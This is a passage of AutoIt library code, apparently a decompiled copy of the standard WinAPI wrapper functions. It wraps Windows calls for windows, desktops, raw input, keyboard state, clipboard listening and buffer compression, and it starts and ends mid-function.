[0 ] ENDFUNC FUNC _WINAPI_SETWINDOWDISPLAYAFFINITY ($HWND , $IAFFINITY ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "SetWindowDisplayAffinity" , "hwnd" , $HWND , "dword" , $IAFFINITY ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_SETWINDOWLONG ($HWND , $IINDEX , $IVALUE ) _WINAPI_SETLASTERROR (0 ) LOCAL $SFUNCNAME = "SetWindowLongW" IF @AUTOITX64 THEN $SFUNCNAME = "SetWindowLongPtrW" LOCAL $ARESULT = DLLCALL ("user32.dll" , "long_ptr" , $SFUNCNAME , "hwnd" , $HWND , "int" , $IINDEX , "long_ptr" , $IVALUE ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_SETWINDOWPLACEMENT ($HWND , $TWINDOWPLACEMENT ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "bool" , "SetWindowPlacement" , "hwnd" , $HWND , "struct*" , $TWINDOWPLACEMENT ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_SHOWOWNEDPOPUPS ($HWND , $BSHOW ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "ShowOwnedPopups" , "hwnd" , $HWND , "bool" , $BSHOW ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_SWITCHTOTHISWINDOW ($HWND , $BALTTAB = FALSE ) DLLCALL ("user32.dll" , "none" , "SwitchToThisWindow" , "hwnd" , $HWND , "bool" , $BALTTAB ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN 1 ENDFUNC FUNC _WINAPI_TILEWINDOWS ($AWNDS , $TRECT = 0 , $HPARENT = 0 , $IFLAGS = 0 , $ISTART = 0 , $IEND = + 4294967295 ) IF __CHECKERRORARRAYBOUNDS ($AWNDS , $ISTART , $IEND ) THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) LOCAL $ICOUNT = $IEND - $ISTART + 1 LOCAL $TWNDS = DLLSTRUCTCREATE ("hwnd[" & $ICOUNT & "]" ) $ICOUNT = 1 FOR $I = $ISTART TO $IEND DLLSTRUCTSETDATA ($TWNDS , 1 , $AWNDS [$I ] , $ICOUNT ) $ICOUNT += 1 NEXT LOCAL $ARET = DLLCALL ("user32.dll" , "word" , "TileWindows" , "hwnd" , $HPARENT , "uint" , $IFLAGS , "struct*" , $TRECT , "uint" , $ICOUNT + 4294967295 , "struct*" , $TWNDS ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_UNREGISTERCLASS ($SCLASS , $HINSTANCE = 0 ) LOCAL $STYPEOFCLASS = "ptr" IF ISSTRING ($SCLASS ) THEN $STYPEOFCLASS = "wstr" ENDIF LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "UnregisterClassW" , $STYPEOFCLASS , $SCLASS , "handle" , $HINSTANCE ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_UPDATELAYEREDWINDOW ($HWND , $HDESTDC , $TPTDEST , $TSIZE , $HSRCDC , $TPTSRCE , $IRGB , $TBLEND , $IFLAGS ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "bool" , "UpdateLayeredWindow" , "hwnd" , $HWND , "handle" , $HDESTDC , "struct*" , $TPTDEST , "struct*" , $TSIZE , "handle" , $HSRCDC , "struct*" , $TPTSRCE , "dword" , $IRGB , "struct*" , $TBLEND , "dword" , $IFLAGS ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_UPDATELAYEREDWINDOWEX ($HWND , $IX , $IY , $HBITMAP , $IOPACITY = 255 , $BDELETE = FALSE ) LOCAL $ARET = DLLCALL ("user32.dll" , "handle" , "GetDC" , "hwnd" , $HWND ) LOCAL $HDC = $ARET [0 ] $ARET = DLLCALL ("gdi32.dll" , "handle" , "CreateCompatibleDC" , "handle" , $HDC ) LOCAL $HDESTDC = $ARET [0 ] $ARET = DLLCALL ("gdi32.dll" , "handle" , "SelectObject" , "handle" , $HDESTDC , "handle" , $HBITMAP ) LOCAL $HDESTSV = $ARET [0 ] LOCAL $TPOINT IF ($IX = + 4294967295 ) AND ($IY = + 4294967295 ) THEN $TPOINT = DLLSTRUCTCREATE ("int;int" ) ELSE $TPOINT = DLLSTRUCTCREATE ("int;int;int;int" ) DLLSTRUCTSETDATA ($TPOINT , 3 , $IX ) DLLSTRUCTSETDATA ($TPOINT , 4 , $IY ) ENDIF DLLSTRUCTSETDATA ($TPOINT , 1 , 0 ) DLLSTRUCTSETDATA ($TPOINT , 2 , 0 ) LOCAL $TBLENDFUNCTION = DLLSTRUCTCREATE ($TAGBLENDFUNCTION ) DLLSTRUCTSETDATA ($TBLENDFUNCTION , 1 , 0 ) DLLSTRUCTSETDATA ($TBLENDFUNCTION , 2 , 0 ) DLLSTRUCTSETDATA ($TBLENDFUNCTION , 3 , $IOPACITY ) DLLSTRUCTSETDATA ($TBLENDFUNCTION , 4 , 1 ) LOCAL CONST $TAGBITMAP = "struct;long bmType;long bmWidth;long bmHeight;long bmWidthBytes;ushort bmPlanes;ushort bmBitsPixel;ptr bmBits;endstruct" LOCAL $TOBJ = DLLSTRUCTCREATE ($TAGBITMAP ) DLLCALL ("gdi32.dll" , "int" , "GetObject" , "handle" , $HBITMAP , "int" , DLLSTRUCTGETSIZE ($TOBJ ) , "struct*" , $TOBJ ) LOCAL $TSIZE = DLLSTRUCTCREATE ($TAGSIZE , DLLSTRUCTGETPTR ($TOBJ , "bmWidth" ) ) $ARET = DLLCALL ("user32.dll" , "bool" , "UpdateLayeredWindow" , "hwnd" , $HWND , "handle" , $HDC , "ptr" , DLLSTRUCTGETPTR ($TPOINT , 3 ) , "struct*" , $TSIZE , "handle" , $HDESTDC , "struct*" , $TPOINT , "dword" , 0 , "struct*" , $TBLENDFUNCTION , "dword" , 2 ) LOCAL $IERROR = @ERROR DLLCALL ("user32.dll" , "bool" , "ReleaseDC" , "hwnd" , $HWND , "handle" , $HDC ) DLLCALL ("gdi32.dll" , "handle" , "SelectObject" , "handle" , $HDESTDC , "handle" , $HDESTSV ) DLLCALL ("gdi32.dll" , "bool" , "DeleteDC" , "handle" , $HDESTDC ) IF $IERROR THEN RETURN SETERROR ($IERROR , 0 , FALSE ) IF $BDELETE THEN DLLCALL ("gdi32.dll" , "bool" , "DeleteObject" , "handle" , $HBITMAP ) ENDIF RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_UPDATELAYEREDWINDOWINDIRECT ($HWND , $TULWINFO ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "UpdateLayeredWindowIndirect" , "hwnd" , $HWND , "struct*" , $TULWINFO ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_WINDOWFROMPOINT (BYREF $TPOINT ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "hwnd" , "WindowFromPoint" , "struct" , $TPOINT ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC #EndRegion Public Functions #Region Internal Functions FUNC __ENUMDEFAULTPROC ($PDATA , $LPARAM ) #forceref $lParam LOCAL $ILENGTH = _WINAPI_STRLEN ($PDATA ) __INC ($__G_VENUM ) IF $ILENGTH THEN $__G_VENUM [$__G_VENUM [0 ] ] = DLLSTRUCTGETDATA (DLLSTRUCTCREATE ("wchar[" & ($ILENGTH + 1 ) & "]" , $PDATA ) , 1 ) ELSE $__G_VENUM [$__G_VENUM [0 ] ] = "" ENDIF RETURN 1 ENDFUNC #EndRegion Internal Functions #Region Global Variables and Constants GLOBAL CONST $TAGOSVERSIONINFOEX = $TAGOSVERSIONINFO & ";ushort ServicePackMajor;ushort ServicePackMinor;ushort SuiteMask;byte ProductType;byte Reserved" GLOBAL CONST $TAGRAWINPUTDEVICE = "struct;ushort UsagePage;ushort Usage;dword Flags;hwnd hTarget;endstruct" GLOBAL CONST $TAGRAWINPUTHEADER = "struct;dword Type;dword Size;handle hDevice;wparam wParam;endstruct" GLOBAL CONST $TAGRAWMOUSE = "ushort Flags;ushort Alignment;ushort ButtonFlags;ushort ButtonData;ulong RawButtons;long LastX;long LastY;ulong ExtraInformation;" GLOBAL CONST $TAGRAWKEYBOARD = "ushort MakeCode;ushort Flags;ushort Reserved;ushort VKey;uint Message;ulong ExtraInformation;" GLOBAL CONST $TAGRAWHID = "dword SizeHid;dword Count;" GLOBAL CONST $TAGRAWINPUTMOUSE = $TAGRAWINPUTHEADER & ";" & $TAGRAWMOUSE GLOBAL CONST $TAGRAWINPUTKEYBOARD = $TAGRAWINPUTHEADER & ";" & $TAGRAWKEYBOARD GLOBAL CONST $TAGRAWINPUTHID = $TAGRAWINPUTHEADER & ";" & $TAGRAWHID GLOBAL CONST $TAGRID_DEVICE_INFO_MOUSE = "struct;dword Id;dword NumberOfButtons;dword SampleRate;int HasHorizontalWheel;endstruc" GLOBAL CONST $TAGRID_DEVICE_INFO_KEYBOARD = "struct;dword KbType;dword KbSubType;dword KeyboardMode;dword NumberOfFunctionKeys;dword NumberOfIndicators;dword NumberOfKeysTotal;endstruc" GLOBAL CONST $TAGRID_DEVICE_INFO_HID = "struct;dword VendorId;dword ProductId;dword VersionNumber;ushort UsagePage;ushort Usage;endstruc" GLOBAL CONST $TAGRID_INFO_MOUSE = "dword Size;dword Type;" & $TAGRID_DEVICE_INFO_MOUSE & ";dword Unused[2];" GLOBAL CONST $TAGRID_INFO_KEYBOARD = "dword Size;dword Type;" & $TAGRID_DEVICE_INFO_KEYBOARD GLOBAL CONST $TAGRID_INFO_HID = "dword Size;dword Type;" & $TAGRID_DEVICE_INFO_HID & ";dword Unused[2]" GLOBAL CONST $TAGUSEROBJECTFLAGS = "int Inherit;int Reserved;dword Flags" #EndRegion Global Variables and Constants #Region Functions list #EndRegion Functions list #Region Public Functions FUNC _WINAPI_ACTIVATEKEYBOARDLAYOUT ($HLOCALE , $IFLAG = 0 ) LOCAL $ARET = DLLCALL ("user32.dll" , "handle" , "ActivateKeyboardLayout" , "handle" , $HLOCALE , "uint" , $IFLAG ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_ADDCLIPBOARDFORMATLISTENER ($HWND ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "AddClipboardFormatListener" , "hwnd" , $HWND ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_CALLNEXTHOOKEX ($HHOOK , $ICODE , $WPARAM , $LPARAM ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "lresult" , "CallNextHookEx" , "handle" , $HHOOK , "int" , $ICODE , "wparam" , $WPARAM , "lparam" , $LPARAM ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , + 4294967295 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_CLOSEDESKTOP ($HDESKTOP ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "CloseDesktop" , "handle" , $HDESKTOP ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_CLOSEWINDOWSTATION ($HSTATION ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "CloseWindowStation" , "handle" , $HSTATION ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_COMPRESSBUFFER ($PUNCOMPRESSEDBUFFER , $IUNCOMPRESSEDSIZE , $PCOMPRESSEDBUFFER , $ICOMPRESSEDSIZE , $IFORMATANDENGINE = 2 ) LOCAL $ARET , $PWORKSPACE = 0 , $IERROR = 0 DO $ARET = DLLCALL ("ntdll.dll" , "uint" , "RtlGetCompressionWorkSpaceSize" , "ushort" , $IFORMATANDENGINE , "ulong*" , 0 , "ulong*" , 0 ) IF @ERROR OR $ARET [0 ] THEN $IERROR = @ERROR + 20 EXITLOOP ENDIF $PWORKSPACE = __HEAPALLOC ($ARET [2 ] ) IF @ERROR THEN $IERROR = @ERROR + 100 EXITLOOP ENDIF $ARET = DLLCALL ("ntdll.dll" , "uint" , "RtlCompressBuffer" , "ushort" , $IFORMATANDENGINE , "struct*" , $PUNCOMPRESSEDBUFFER , "ulong" , $IUNCOMPRESSEDSIZE , "struct*" , $PCOMPRESSEDBUFFER , "ulong" , $ICOMPRESSEDSIZE , "ulong" , 4096 , "ulong*" , 0 , "ptr" , $PWORKSPACE ) IF @ERROR OR $ARET [0 ] OR NOT $ARET [7 ] THEN $IERROR = @ERROR + 30 EXITLOOP ENDIF UNTIL 1 __HEAPFREE ($PWORKSPACE ) IF $IERROR THEN IF ISARRAY ($ARET ) THEN RETURN SETERROR (10 , $ARET [0 ] , 0 ) ELSE RETURN SETERROR ($IERROR , 0 , 0 ) ENDIF ENDIF RETURN $ARET [7 ] ENDFUNC FUNC _WINAPI_COMPUTECRC32 ($PMEMORY , $ILENGTH ) IF _WINAPI_ISBADREADPTR ($PMEMORY , $ILENGTH ) THEN RETURN SETERROR (1 , @EXTENDED , 0 ) LOCAL $ARET = DLLCALL ("ntdll.dll" , "dword" , "RtlComputeCrc32" , "dword" , 0 , "struct*" , $PMEMORY , "int" , $ILENGTH ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_CREATEDESKTOP ($SNAME , $IACCESS = 2 , $IFLAGS = 0 , $IHEAP = 0 , $TSECURITY = 0 ) LOCAL $ARET IF $IHEAP THEN $ARET = DLLCALL ("user32.dll" , "handle" , "CreateDesktopExW" , "wstr" , $SNAME , "ptr" , 0 , "ptr" , 0 , "dword" , $IFLAGS , "dword" , $IACCESS , "struct*" , $TSECURITY , "ulong" , $IHEAP , "ptr" , 0 ) ELSE $ARET = DLLCALL ("user32.dll" , "handle" , "CreateDesktopW" , "wstr" , $SNAME , "ptr" , 0 , "ptr" , 0 , "dword" , $IFLAGS , "dword" , $IACCESS , "struct*" , $TSECURITY ) ENDIF IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_CREATEWINDOWSTATION ($SNAME = "" , $IACCESS = 0 , $IFLAGS = 0 , $TSECURITY = 0 ) LOCAL $ARET = DLLCALL ("user32.dll" , "handle" , "CreateWindowStationW" , "wstr" , $SNAME , "dword" , $IFLAGS , "dword" , $IACCESS , "struct*" , $TSECURITY ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_DECOMPRESSBUFFER ($PUNCOMPRESSEDBUFFER , $IUNCOMPRESSEDSIZE , $PCOMPRESSEDBUFFER , $ICOMPRESSEDSIZE , $IFORMAT = 2 ) LOCAL $ARET = DLLCALL ("ntdll.dll" , "long" , "RtlDecompressBuffer" , "ushort" , $IFORMAT , "struct*" , $PUNCOMPRESSEDBUFFER , "ulong" , $IUNCOMPRESSEDSIZE , "struct*" , $PCOMPRESSEDBUFFER , "ulong" , $ICOMPRESSEDSIZE , "ulong*" , 0 ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) IF $ARET [0 ] THEN RETURN SETERROR (10 , $ARET [0 ] , 0 ) RETURN $ARET [6 ] ENDFUNC FUNC _WINAPI_DEFRAWINPUTPROC ($PARAWINPUT , $IINPUT ) LOCAL $ARET = DLLCALL ("user32.dll" , "lresult" , "DefRawInputProc" , "ptr" , $PARAWINPUT , "int" , $IINPUT , "uint" , DLLSTRUCTGETSIZE (DLLSTRUCTCREATE ($TAGRAWINPUTHEADER ) ) ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) IF $ARET [0 ] THEN RETURN SETERROR (10 , $ARET [0 ] , 0 ) RETURN 1 ENDFUNC FUNC _WINAPI_ENUMDESKTOPS ($HSTATION ) IF STRINGCOMPARE (_WINAPI_GETUSEROBJECTINFORMATION ($HSTATION , 3 ) , "WindowStation" ) THEN RETURN SETERROR (1 , 0 , 0 ) LOCAL $HENUMPROC = DLLCALLBACKREGISTER ("__EnumDefaultProc" , "bool" , "ptr;lparam" ) DIM $__G_VENUM [101 ] = [0 ] LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "EnumDesktopsW" , "handle" , $HSTATION , "ptr" , DLLCALLBACKGETPTR ($HENUMPROC ) , "lparam" , 0 ) IF @ERROR OR NOT $ARET [0 ] OR NOT $__G_VENUM [0 ] THEN $__G_VENUM = @ERROR + 10 ENDIF DLLCALLBACKFREE ($HENUMPROC ) IF $__G_VENUM THEN RETURN SETERROR ($__G_VENUM , 0 , 0 ) __INC ($__G_VENUM , + 4294967295 ) RETURN $__G_VENUM ENDFUNC FUNC _WINAPI_ENUMDESKTOPWINDOWS ($HDESKTOP , $BVISIBLE = TRUE ) IF STRINGCOMPARE (_WINAPI_GETUSEROBJECTINFORMATION ($HDESKTOP , 3 ) , "Desktop" ) THEN RETURN SETERROR (1 , 0 , 0 ) LOCAL $HENUMPROC = DLLCALLBACKREGISTER ("__EnumWindowsProc" , "bool" , "hwnd;lparam" ) DIM $__G_VENUM [101 ] [2 ] = [[0 ] ] LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "EnumDesktopWindows" , "handle" , $HDESKTOP , "ptr" , DLLCALLBACKGETPTR ($HENUMPROC ) , "lparam" , $BVISIBLE ) IF @ERROR OR NOT $ARET [0 ] OR NOT $__G_VENUM [0 ] [0 ] THEN $__G_VENUM = @ERROR + 10 ENDIF DLLCALLBACKFREE ($HENUMPROC ) IF $__G_VENUM THEN RETURN SETERROR ($__G_VENUM , 0 , 0 ) __INC ($__G_VENUM , + 4294967295 ) RETURN $__G_VENUM ENDFUNC FUNC _WINAPI_ENUMPAGEFILES () LOCAL $AINFO = _WINAPI_GETSYSTEMINFO () LOCAL $HENUMPROC = DLLCALLBACKREGISTER ("__EnumPageFilesProc" , "bool" , "lparam;ptr;ptr" ) DIM $__G_VENUM [101 ] [4 ] = [[0 ] ] LOCAL $ARET = DLLCALL (@SYSTEMDIR & "\psapi.dll" , "bool" , "EnumPageFilesW" , "ptr" , DLLCALLBACKGETPTR ($HENUMPROC ) , "lparam" , $AINFO [1 ] ) IF @ERROR OR NOT $ARET [0 ] OR NOT $__G_VENUM [0 ] [0 ] THEN $__G_VENUM = @ERROR + 10 ENDIF DLLCALLBACKFREE ($HENUMPROC ) IF $__G_VENUM THEN RETURN SETERROR ($__G_VENUM , 0 , 0 ) __INC ($__G_VENUM , + 4294967295 ) RETURN $__G_VENUM ENDFUNC FUNC _WINAPI_ENUMRAWINPUTDEVICES () LOCAL CONST $TAGRAWINPUTDEVICELIST = "struct;handle hDevice;dword Type;endstruct" LOCAL $TRIDL , $ILENGTH = DLLSTRUCTGETSIZE (DLLSTRUCTCREATE ($TAGRAWINPUTDEVICELIST ) ) LOCAL $ARET = DLLCALL ("user32.dll" , "uint" , "GetRawInputDeviceList" , "ptr" , 0 , "uint*" , 0 , "uint" , $ILENGTH ) IF @ERROR THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) IF ($ARET [0 ] = 0xFFFFFFFF ) OR (NOT $ARET [2 ] ) THEN RETURN SETERROR (10 , + 4294967295 , 0 ) LOCAL $TDATA = DLLSTRUCTCREATE ("byte[" & ($ARET [2 ] * $ILENGTH ) & "]" ) LOCAL $PDATA = DLLSTRUCTGETPTR ($TDATA ) IF @ERROR THEN RETURN SETERROR (@ERROR + 20 , 0 , 0 ) $ARET = DLLCALL ("user32.dll" , "uint" , "GetRawInputDeviceList" , "ptr" , $PDATA , "uint*" , $ARET [2 ] , "uint" , $ILENGTH ) IF ($ARET [0 ] = 0xFFFFFFFF ) OR (NOT $ARET [0 ] ) THEN RETURN SETERROR (1 , + 4294967295 , 0 ) LOCAL $ARESULT [$ARET [2 ] + 1 ] [2 ] = [[$ARET [2 ] ] ] FOR $I = 1 TO $ARET [2 ] $TRIDL = DLLSTRUCTCREATE ("ptr;dword" , $PDATA + $ILENGTH * ($I + 4294967295 ) ) FOR $J = 0 TO 1 $ARESULT [$I ] [$J ] = DLLSTRUCTGETDATA ($TRIDL , $J + 1 ) NEXT NEXT RETURN $ARESULT ENDFUNC FUNC _WINAPI_ENUMWINDOWSTATIONS () LOCAL $HENUMPROC = DLLCALLBACKREGISTER ("__EnumDefaultProc" , "bool" , "ptr;lparam" ) DIM $__G_VENUM [101 ] = [0 ] LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "EnumWindowStationsW" , "ptr" , DLLCALLBACKGETPTR ($HENUMPROC ) , "lparam" , 0 ) IF @ERROR OR NOT $ARET [0 ] OR NOT $__G_VENUM [0 ] THEN $__G_VENUM = @ERROR + 10 ENDIF DLLCALLBACKFREE ($HENUMPROC ) IF $__G_VENUM THEN RETURN SETERROR ($__G_VENUM , 0 , 0 ) __INC ($__G_VENUM , + 4294967295 ) RETURN $__G_VENUM ENDFUNC FUNC _WINAPI_EXPANDENVIRONMENTSTRINGS ($SSTRING ) LOCAL $ARESULT = DLLCALL ("kernel32.dll" , "dword" , "ExpandEnvironmentStringsW" , "wstr" , $SSTRING , "wstr" , "" , "dword" , 4096 ) IF @ERROR OR NOT $ARESULT [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , "" ) RETURN $ARESULT [2 ] ENDFUNC FUNC _WINAPI_GETACTIVEWINDOW () LOCAL $ARET = DLLCALL ("user32.dll" , "hwnd" , "GetActiveWindow" ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_GETASYNCKEYSTATE ($IKEY ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "short" , "GetAsyncKeyState" , "int" , $IKEY ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_GETCLIPBOARDSEQUENCENUMBER () LOCAL $ARET = DLLCALL ("user32.dll" , "dword" , "GetClipboardSequenceNumber" ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_GETCURRENTHWPROFILE () LOCAL $TAGHW_PROFILE_INFO = "dword DockInfo;wchar szHwProfileGuid[39];wchar szHwProfileName[80]" LOCAL $THWPI = DLLSTRUCTCREATE ($TAGHW_PROFILE_INFO ) LOCAL $ARET = DLLCALL ("advapi32.dll" , "bool" , "GetCurrentHwProfileW" , "struct*" , $THWPI ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) LOCAL $ARESULT [3 ] FOR $I = 0 TO 2 $ARESULT [$I ] = DLLSTRUCTGETDATA ($THWPI , $I + 1 ) NEXT RETURN $ARESULT ENDFUNC FUNC _WINAPI_GETDEFAULTPRINTER () LOCAL $ARET = DLLCALL ("winspool.drv" , "bool" , "GetDefaultPrinterW" , "wstr" , "" , "dword*" , 2048 ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , "" ) IF NOT $ARET [0 ] THEN RETURN SETERROR (10 , _WINAPI_GETLASTERROR () , "" ) RETURN $ARET [1 ] ENDFUNC FUNC _WINAPI_GETDLLDIRECTORY () LOCAL $ARET = DLLCALL ("kernel32.dll" , "dword" , "GetDllDirectoryW" , "dword" , 4096 , "wstr" , "" ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR , @EXTENDED , "" ) RETURN $ARET [2 ] ENDFUNC FUNC _WINAPI_GETEFFECTIVECLIENTRECT ($HWND , $ACTRL , $ISTART = 0 , $IEND = + 4294967295 ) IF NOT ISARRAY ($ACTRL ) THEN LOCAL $ICTRL = $ACTRL DIM $ACTRL [1 ] = [$ICTRL ] $ISTART = 0 $IEND = 0 ENDIF IF __CHECKERRORARRAYBOUNDS ($ACTRL , $ISTART , $IEND ) THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) LOCAL $ICOUNT = $IEND - $ISTART + 1 LOCAL $TCTRL = DLLSTRUCTCREATE ("uint64[" & ($ICOUNT + 2 ) & "]" ) $ICOUNT = 2 FOR $I = $ISTART TO $IEND IF ISHWND ($ACTRL [$I ] ) THEN $ACTRL [$I ] = _WINAPI_GETDLGCTRLID ($ACTRL [$I ] ) ENDIF DLLSTRUCTSETDATA ($TCTRL , 1 , _WINAPI_MAKEQWORD (1 , $ACTRL [$I ] ) , $ICOUNT ) $ICOUNT += 1 NEXT LOCAL $TRECT = DLLSTRUCTCREATE ($TAGRECT ) DLLCALL ("comctl32.dll" , "none" , "GetEffectiveClientRect" , "hwnd" , $HWND , "struct*" , $TRECT , "struct*" , $TCTRL ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $TRECT ENDFUNC FUNC _WINAPI_GETHANDLEINFORMATION ($HOBJECT ) LOCAL $ARET = DLLCALL ("kernel32.dll" , "bool" , "GetHandleInformation" , "handle" , $HOBJECT , "dword*" , 0 ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [2 ] ENDFUNC FUNC _WINAPI_GETIDLETIME () LOCAL $TLASTINPUTINFO = DLLSTRUCTCREATE ("uint;dword" ) DLLSTRUCTSETDATA ($TLASTINPUTINFO , 1 , DLLSTRUCTGETSIZE ($TLASTINPUTINFO ) ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "GetLastInputInfo" , "struct*" , $TLASTINPUTINFO ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN _WINAPI_GETTICKCOUNT () - DLLSTRUCTGETDATA ($TLASTINPUTINFO , 2 ) ENDFUNC FUNC _WINAPI_GETKEYBOARDLAYOUT ($HWND ) LOCAL $ARET = DLLCALL ("user32.dll" , "dword" , "GetWindowThreadProcessId" , "hwnd" , $HWND , "ptr" , 0 ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) $ARET = DLLCALL ("user32.dll" , "handle" , "GetKeyboardLayout" , "dword" , $ARET [0 ] ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_GETKEYBOARDLAYOUTLIST () LOCAL $ARET = DLLCALL ("user32.dll" , "uint" , "GetKeyboardLayoutList" , "int" , 0 , "ptr" , 0 ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR + 20 , @EXTENDED , 0 ) LOCAL $TDATA = DLLSTRUCTCREATE ("handle[" & $ARET [0 ] & "]" ) $ARET = DLLCALL ("user32.dll" , "uint" , "GetKeyboardLayoutList" , "int" , $ARET [0 ] , "struct*" , $TDATA ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) LOCAL $ALIST [$ARET [0 ] + 1 ] = [$ARET [0 ] ] FOR $I = 1 TO $ALIST [0 ] $ALIST [$I ] = DLLSTRUCTGETDATA ($TDATA , 1 , $I ) NEXT RETURN $ALIST ENDFUNC FUNC _WINAPI_GETKEYBOARDSTATE () LOCAL $TDATA = DLLSTRUCTCREATE ("byte[256]" ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "GetKeyboardState" , "struct*" , $TDATA ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) RETURN $TDATA ENDFUNC FUNC _WINAPI_GETKEYBOARDTYPE ($ITYPE ) LOCAL $ARET = DLLCALL ("user32.dll" , "int" , "GetKeyboardType" , "int" , $ITYPE ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_GETKEYNAMETEXT ($LPARAM ) LOCAL $ARET = DLLCALL ("user32.dll" , "int" , "GetKeyNameTextW" , "long" , $LPARAM , "wstr" , "" , "int" , 128 ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR , @EXTENDED , "" ) RETURN $ARET [2 ] ENDFUNC FUNC _WINAPI_GETKEYSTATE ($VKEY ) LOCAL $ARET = DLLCALL ("user32.dll" , "short" , "GetKeyState" , "int" , $VKEY ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_GETMODULEHANDLEEX ($SMODULE , $IFLAGS = 0 ) LOCAL $STYPEOFMODULE = "ptr" IF ISSTRING ($SMODULE ) THEN IF STRINGSTRIPWS ($SMODULE , $STR_STRIPLEADING + $STR_STRIPTRAILING ) THEN $STYPEOFMODULE = "wstr" ELSE $SMODULE = 0 ENDIF ENDIF LOCAL $ARET = DLLCALL ("kernel32.dll" , "bool" 